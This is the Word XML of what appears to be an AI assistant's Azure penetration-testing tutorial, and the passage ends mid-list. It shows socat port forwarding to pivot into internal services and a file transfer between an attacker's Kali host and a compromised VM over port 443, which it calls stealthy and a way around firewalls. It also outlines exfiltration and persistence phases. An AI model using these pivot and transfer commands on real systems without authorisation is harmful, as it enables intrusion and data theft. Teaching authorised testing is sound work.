          <v:rect id="_x0000_i1039" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="75F2E1BF"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Summary</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01CB6536" w14:textId="77777777" w:rsidR="00EC435D" w:rsidRPr="00EC435D" w:rsidRDefault="00EC435D" w:rsidP="00EC435D">
      <w:r w:rsidRPr="00EC435D">
        <w:t>You:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72F66FCD" w14:textId="77777777" w:rsidR="00EC435D" w:rsidRPr="00EC435D" w:rsidRDefault="00EC435D" w:rsidP="00EC435D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00EC435D">
        <w:t>Gained access to a VM in Azure.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="732C0B99" w14:textId="77777777" w:rsidR="00EC435D" w:rsidRPr="00EC435D" w:rsidRDefault="00EC435D" w:rsidP="00EC435D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00EC435D">
        <w:t>Discovered an internal-only HTTP service.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BC5F4B9" w14:textId="77777777" w:rsidR="00EC435D" w:rsidRPr="00EC435D" w:rsidRDefault="00EC435D" w:rsidP="00EC435D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00EC435D">
        <w:t xml:space="preserve">Used </w:t>
      </w:r>
      <w:r w:rsidRPr="00EC435D">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>port forwarding with Socat</w:t>
      </w:r>
      <w:r w:rsidRPr="00EC435D">
        <w:t xml:space="preserve"> to expose it externally.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="744A5F0E" w14:textId="77777777" w:rsidR="00EC435D" w:rsidRPr="00EC435D" w:rsidRDefault="00EC435D" w:rsidP="00EC435D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00EC435D">
        <w:t>Accessed and interacted with a restricted internal service.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="642D940B" w14:textId="77777777" w:rsidR="00EC435D" w:rsidRPr="00EC435D" w:rsidRDefault="00000000" w:rsidP="00EC435D">
      <w:r>
        <w:pict w14:anchorId="0E04CB6D">
          <v:rect id="_x0000_i1040" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="439562DB" w14:textId="77777777" w:rsidR="00EC435D" w:rsidRPr="00EC435D" w:rsidRDefault="00EC435D" w:rsidP="00EC435D">
      <w:r w:rsidRPr="00EC435D">
        <w:t>Would you like a downloadable version of this walkthrough (PDF or Markdown), or should we expand this into a multi-stage Azure lab guide?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7ABCFC48" w14:textId="77777777" w:rsidR="000B0495" w:rsidRDefault="000B0495">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="18637F1B" w14:textId="77777777" w:rsidR="00EC435D" w:rsidRDefault="00EC435D">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="506D283F" w14:textId="77777777" w:rsidR="00EC435D" w:rsidRPr="00EC435D" w:rsidRDefault="00EC435D" w:rsidP="00EC435D">
      <w:r w:rsidRPr="00EC435D">
        <w:t xml:space="preserve">Here is a </w:t>
      </w:r>
      <w:r w:rsidRPr="00EC435D">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>corrected and summarized version</w:t>
      </w:r>
      <w:r w:rsidRPr="00EC435D">
        <w:t xml:space="preserve"> of your content in the context of an </w:t>
      </w:r>
      <w:r w:rsidRPr="00EC435D">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Azure penetration test</w:t>
      </w:r>
      <w:r w:rsidRPr="00EC435D">
        <w:t xml:space="preserve">, focusing on </w:t>
      </w:r>
      <w:r w:rsidRPr="00EC435D">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>file transfer using Socat</w:t>
      </w:r>
      <w:r w:rsidRPr="00EC435D">
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06ADE0AB" w14:textId="77777777" w:rsidR="00EC435D" w:rsidRPr="00EC435D" w:rsidRDefault="00000000" w:rsidP="00EC435D">
      <w:r>
        <w:pict w14:anchorId="37AFBC35">
          <v:rect id="_x0000_i1041" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="5790A330"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File Transfer in Azure Penetration Testing Using Socat</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62D14293" w14:textId="77777777" w:rsidR="00EC435D" w:rsidRPr="00EC435D" w:rsidRDefault="00EC435D" w:rsidP="00EC435D">
      <w:r w:rsidRPr="00EC435D">
        <w:t xml:space="preserve">In Azure penetration testing, once you’ve gained access to a virtual machine or container, you may need to </w:t>
      </w:r>
      <w:r w:rsidRPr="00EC435D">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>transfer files</w:t>
      </w:r>
      <w:r w:rsidRPr="00EC435D">
        <w:t xml:space="preserve">—such as tools, payloads, or stolen data—between your attacker machine and the compromised system. </w:t>
      </w:r>
      <w:r w:rsidRPr="00EC435D">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Socat</w:t>
      </w:r>
      <w:r w:rsidRPr="00EC435D">
        <w:t xml:space="preserve"> is a versatile tool that supports encrypted and unencrypted </w:t>
      </w:r>
      <w:r w:rsidRPr="00EC435D">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>file transfer over TCP</w:t>
      </w:r>
      <w:r w:rsidRPr="00EC435D">
        <w:t>, making it a powerful alternative to Netcat in environments where traditional transfer methods are blocked or monitored.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10F3EEF3"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Demonstration: Transferring a File from Kali to Ubuntu VM</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7922A92E" w14:textId="77777777" w:rsidR="00EC435D" w:rsidRPr="00EC435D" w:rsidRDefault="00EC435D" w:rsidP="00EC435D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="9"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00EC435D">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Create the File on Kali</w:t>
      </w:r>
      <w:r w:rsidRPr="00EC435D">
        <w:br/>
        <w:t>Prepare the file to be transferred. For example:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41C13FCC" w14:textId="77777777" w:rsidR="00EC435D" w:rsidRPr="00EC435D" w:rsidRDefault="00EC435D" w:rsidP="00EC435D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="9"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="clear" w:pos="720"/>
        </w:tabs>
      </w:pPr>
      <w:r w:rsidRPr="00EC435D">
        <w:t>echo "This is a demo file." &gt; demo.txt</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2DB95924" w14:textId="77777777" w:rsidR="00EC435D" w:rsidRPr="00EC435D" w:rsidRDefault="00EC435D" w:rsidP="00EC435D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="9"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00EC435D">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Host the File Using Socat (on Kali)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A9D805D" w14:textId="77777777" w:rsidR="00EC435D" w:rsidRPr="00EC435D" w:rsidRDefault="00EC435D" w:rsidP="00EC435D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="9"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="clear" w:pos="720"/>
        </w:tabs>
      </w:pPr>
      <w:r w:rsidRPr="00EC435D">
        <w:t>socat TCP4-LISTEN:443,fork FILE:demo.txt</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="475231CC" w14:textId="77777777" w:rsidR="00EC435D" w:rsidRPr="00EC435D" w:rsidRDefault="00EC435D" w:rsidP="00EC435D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="9"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00EC435D">
        <w:t>This sets up a TCP listener on port 443 and serves the file demo.txt upon connection.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="374D39EC" w14:textId="77777777" w:rsidR="00EC435D" w:rsidRPr="00EC435D" w:rsidRDefault="00EC435D" w:rsidP="00EC435D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="9"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00EC435D">
        <w:t>Port 443 is often allowed through firewalls, making it a stealthy choice.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28B3F245" w14:textId="77777777" w:rsidR="00EC435D" w:rsidRPr="00EC435D" w:rsidRDefault="00EC435D" w:rsidP="00EC435D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="9"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00EC435D">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Receive the File on the Ubuntu VM (Target)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A620B3F" w14:textId="77777777" w:rsidR="00EC435D" w:rsidRPr="00EC435D" w:rsidRDefault="00EC435D" w:rsidP="00EC435D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="9"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="clear" w:pos="720"/>
        </w:tabs>
      </w:pPr>
      <w:r w:rsidRPr="00EC435D">
        <w:t>socat TCP4:&lt;kali-ip&gt;:443 FILE:demo.txt,create</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E5642FC" w14:textId="77777777" w:rsidR="00EC435D" w:rsidRPr="00EC435D" w:rsidRDefault="00EC435D" w:rsidP="00EC435D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="9"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00EC435D">
        <w:t>This command connects to the Kali machine and saves the received content as demo.txt.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E5481E3" w14:textId="77777777" w:rsidR="00EC435D" w:rsidRPr="00EC435D" w:rsidRDefault="00EC435D" w:rsidP="00EC435D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="9"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00EC435D">
        <w:t>The create option ensures the file is written locally if it doesn’t already exist.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B0787C0" w14:textId="77777777" w:rsidR="00EC435D" w:rsidRPr="00EC435D" w:rsidRDefault="00EC435D" w:rsidP="00EC435D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="9"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00EC435D">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Verify the Transfer</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4AEFC9FC" w14:textId="77777777" w:rsidR="00EC435D" w:rsidRPr="00EC435D" w:rsidRDefault="00EC435D" w:rsidP="00EC435D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="9"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="clear" w:pos="720"/>
        </w:tabs>
      </w:pPr>
      <w:r w:rsidRPr="00EC435D">
        <w:t>ls</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C249E56" w14:textId="77777777" w:rsidR="00EC435D" w:rsidRPr="00EC435D" w:rsidRDefault="00EC435D" w:rsidP="00EC435D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="9"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="clear" w:pos="720"/>
        </w:tabs>
      </w:pPr>
      <w:r w:rsidRPr="00EC435D">
        <w:t>cat demo.txt</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53DB489F" w14:textId="77777777" w:rsidR="00EC435D" w:rsidRPr="00EC435D" w:rsidRDefault="00EC435D" w:rsidP="00EC435D">
      <w:r w:rsidRPr="00EC435D">
        <w:t>You should see the contents of the file successfully transferred from the attacker to the target.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E7DCD83" w14:textId="77777777" w:rsidR="00EC435D" w:rsidRPr="00EC435D" w:rsidRDefault="00000000" w:rsidP="00EC435D">
      <w:r>
        <w:pict w14:anchorId="6BD3FD04">
          <v:rect id="_x0000_i1042" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B41D495"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Why It’s Useful in Azure Pentests</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0785489A" w14:textId="77777777" w:rsidR="00EC435D" w:rsidRPr="00EC435D" w:rsidRDefault="00EC435D" w:rsidP="00EC435D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="10"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00EC435D">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Bypasses blocked protocols</w:t>
      </w:r>
      <w:r w:rsidRPr="00EC435D">
        <w:t xml:space="preserve"> – Useful when standard file transfer protocols (FTP, SCP) are filtered.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F3EE1B6" w14:textId="77777777" w:rsidR="00EC435D" w:rsidRPr="00EC435D" w:rsidRDefault="00EC435D" w:rsidP="00EC435D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="10"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00EC435D">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Blends in with normal traffic</w:t>
      </w:r>
      <w:r w:rsidRPr="00EC435D">
        <w:t xml:space="preserve"> – Especially when using common ports like 443 or 80.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A65CB93" w14:textId="77777777" w:rsidR="00EC435D" w:rsidRPr="00EC435D" w:rsidRDefault="00EC435D" w:rsidP="00EC435D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="10"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00EC435D">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Works without additional dependencies</w:t>
      </w:r>
      <w:r w:rsidRPr="00EC435D">
        <w:t xml:space="preserve"> – Ideal when Netcat isn’t installed or available.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E3F92AE" w14:textId="77777777" w:rsidR="00EC435D" w:rsidRPr="00EC435D" w:rsidRDefault="00000000" w:rsidP="00EC435D">
      <w:r>
        <w:pict w14:anchorId="3E9E7265">
          <v:rect id="_x0000_i1043" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="27EAF39B"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Conclusion</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B904557" w14:textId="77777777" w:rsidR="00EC435D" w:rsidRPr="00EC435D" w:rsidRDefault="00EC435D" w:rsidP="00EC435D">
      <w:r w:rsidRPr="00EC435D">
        <w:t xml:space="preserve">Although tools like </w:t>
      </w:r>
      <w:r w:rsidRPr="00EC435D">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Netcat</w:t>
      </w:r>
      <w:r w:rsidRPr="00EC435D">
        <w:t xml:space="preserve"> are more commonly used for quick file transfers, </w:t>
      </w:r>
      <w:r w:rsidRPr="00EC435D">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Socat offers more flexibility and robustness</w:t>
      </w:r>
      <w:r w:rsidRPr="00EC435D">
        <w:t xml:space="preserve">, especially in cloud environments like Azure where </w:t>
      </w:r>
      <w:r w:rsidRPr="00EC435D">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>network segmentation, NSGs, and firewalls</w:t>
      </w:r>
      <w:r w:rsidRPr="00EC435D">
        <w:t xml:space="preserve"> may complicate transfers. </w:t>
      </w:r>
      <w:r w:rsidRPr="00EC435D">
        <w:lastRenderedPageBreak/>
        <w:t>Incorporating Socat into your toolkit can make lateral movement and post-exploitation far more effective during Azure engagements.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68C1181C" w14:textId="77777777" w:rsidR="00EC435D" w:rsidRPr="00EC435D" w:rsidRDefault="00000000" w:rsidP="00EC435D">
      <w:r>
        <w:pict w14:anchorId="5F9774EA">
          <v:rect id="_x0000_i1044" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="52C6CD9A" w14:textId="77777777" w:rsidR="00EC435D" w:rsidRPr="00EC435D" w:rsidRDefault="00EC435D" w:rsidP="00EC435D">
      <w:r w:rsidRPr="00EC435D">
        <w:t xml:space="preserve">Would you like this scenario included in a full Azure </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00EC435D">
        <w:t>pentest</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00EC435D">
        <w:t xml:space="preserve"> playbook or guide?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="601DDC24" w14:textId="77777777" w:rsidR="000B0495" w:rsidRDefault="000B0495">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0E471D4C" w14:textId="77777777" w:rsidR="00EC435D" w:rsidRPr="00EC435D" w:rsidRDefault="00EC435D" w:rsidP="00EC435D">
      <w:r w:rsidRPr="00EC435D">
        <w:t xml:space="preserve">Excellent — I'll help you build a structured </w:t>
      </w:r>
      <w:r w:rsidRPr="00EC435D">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Azure Penetration Testing Playbook and Guide</w:t>
      </w:r>
      <w:r w:rsidRPr="00EC435D">
        <w:t xml:space="preserve"> that includes:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="593BA03C" w14:textId="77777777" w:rsidR="00EC435D" w:rsidRPr="00EC435D" w:rsidRDefault="00000000" w:rsidP="00EC435D">
      <w:r>
        <w:pict w14:anchorId="6C548ECC">
          <v:rect id="_x0000_i1045" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F7EFD67"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Azure Pentest Playbook (Overview)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25CC4FEE"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Phases:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A232C70" w14:textId="77777777" w:rsidR="00EC435D" w:rsidRPr="00EC435D" w:rsidRDefault="00EC435D" w:rsidP="00EC435D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="11"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00EC435D">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Reconnaissance</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="226C8966" w14:textId="77777777" w:rsidR="00EC435D" w:rsidRPr="00EC435D" w:rsidRDefault="00EC435D" w:rsidP="00EC435D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="11"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00EC435D">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Initial Access</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38DFD72F" w14:textId="77777777" w:rsidR="00EC435D" w:rsidRPr="00EC435D" w:rsidRDefault="00EC435D" w:rsidP="00EC435D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="11"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00EC435D">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Enumeration (</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00EC435D">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Post-Access</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00EC435D">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E4F0AB3" w14:textId="77777777" w:rsidR="00EC435D" w:rsidRPr="00EC435D" w:rsidRDefault="00EC435D" w:rsidP="00EC435D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="11"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00EC435D">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Lateral Movement</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="395A730F" w14:textId="77777777" w:rsidR="00EC435D" w:rsidRPr="00EC435D" w:rsidRDefault="00EC435D" w:rsidP="00EC435D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="11"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00EC435D">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Privilege Escalation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5DFCCE01" w14:textId="77777777" w:rsidR="00EC435D" w:rsidRPr="00EC435D" w:rsidRDefault="00EC435D" w:rsidP="00EC435D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="11"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00EC435D">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Persistence</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4677E81C" w14:textId="77777777" w:rsidR="00EC435D" w:rsidRPr="00EC435D" w:rsidRDefault="00EC435D" w:rsidP="00EC435D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="11"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00EC435D">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Data Exfiltration</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01105BA8" w14:textId="77777777" w:rsidR="00EC435D" w:rsidRPr="00EC435D" w:rsidRDefault="00EC435D" w:rsidP="00EC435D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="11"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00EC435D">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Cleanup</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B98FB91" w14:textId="77777777" w:rsidR="00EC435D" w:rsidRPr="00EC435D" w:rsidRDefault="00000000" w:rsidP="00EC435D">
      <w:r>
        <w:pict w14:anchorId="02F706AC">
          <v:rect id="_x0000_i1046" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="66F7EB13"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Azure Pentest Guide (Detailed)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="500237F4"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1: Port Forwarding with Socat</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="002975BE" w14:textId="77777777" w:rsidR="00EC435D" w:rsidRPr="00EC435D" w:rsidRDefault="00EC435D" w:rsidP="00EC435D">
      <w:r w:rsidRPr="00EC435D">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Goal</w:t>
      </w:r>
      <w:r w:rsidRPr="00EC435D">
        <w:t>: Access internal-only services via a compromised VM</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5196B54A" w14:textId="77777777" w:rsidR="00EC435D" w:rsidRPr="00EC435D" w:rsidRDefault="00EC435D" w:rsidP="00EC435D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="12"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00EC435D">
        <w:t>Use netstat to identify services on 127.0.0.1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1DB5CBBA" w14:textId="77777777" w:rsidR="00EC435D" w:rsidRPr="00EC435D" w:rsidRDefault="00EC435D" w:rsidP="00EC435D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="12"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00EC435D">
        <w:t>Forward using:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62555963" w14:textId="77777777" w:rsidR="00EC435D" w:rsidRPr="00EC435D" w:rsidRDefault="00EC435D" w:rsidP="00EC435D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="12"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="clear" w:pos="720"/>
        </w:tabs>
      </w:pPr>
      <w:r w:rsidRPr="00EC435D">
        <w:t>socat TCP-LISTEN:&lt;external-port&gt;,</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00EC435D">
        <w:t>fork,reuseaddr</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00EC435D">
        <w:t xml:space="preserve"> TCP:127.0.0.1:&lt;internal-port&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F531B5B" w14:textId="77777777" w:rsidR="00EC435D" w:rsidRPr="00EC435D" w:rsidRDefault="00EC435D" w:rsidP="00EC435D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="12"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00EC435D">
        <w:t>Example: Pivot into internal DB/web dashboard</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="324D5D95" w14:textId="77777777" w:rsidR="00EC435D" w:rsidRPr="00EC435D" w:rsidRDefault="00000000" w:rsidP="00EC435D">
      <w:r>
        <w:pict w14:anchorId="59C7B0F3">
          <v:rect id="_x0000_i1047" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D0BE9C7"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2: File Transfer with Socat</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D147087" w14:textId="77777777" w:rsidR="00EC435D" w:rsidRPr="00EC435D" w:rsidRDefault="00EC435D" w:rsidP="00EC435D">
      <w:r w:rsidRPr="00EC435D">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Goal</w:t>
      </w:r>
      <w:r w:rsidRPr="00EC435D">
        <w:t>: Move tools/scripts into Azure VMs or exfiltrate data</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="042DC0D7" w14:textId="77777777" w:rsidR="00EC435D" w:rsidRPr="00EC435D" w:rsidRDefault="00EC435D" w:rsidP="00EC435D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="13"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00EC435D">
        <w:t>From Kali:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A4BAAC1" w14:textId="77777777" w:rsidR="00EC435D" w:rsidRPr="00EC435D" w:rsidRDefault="00EC435D" w:rsidP="00EC435D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="13"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="clear" w:pos="720"/>
        </w:tabs>
      </w:pPr>
      <w:r w:rsidRPr="00EC435D">
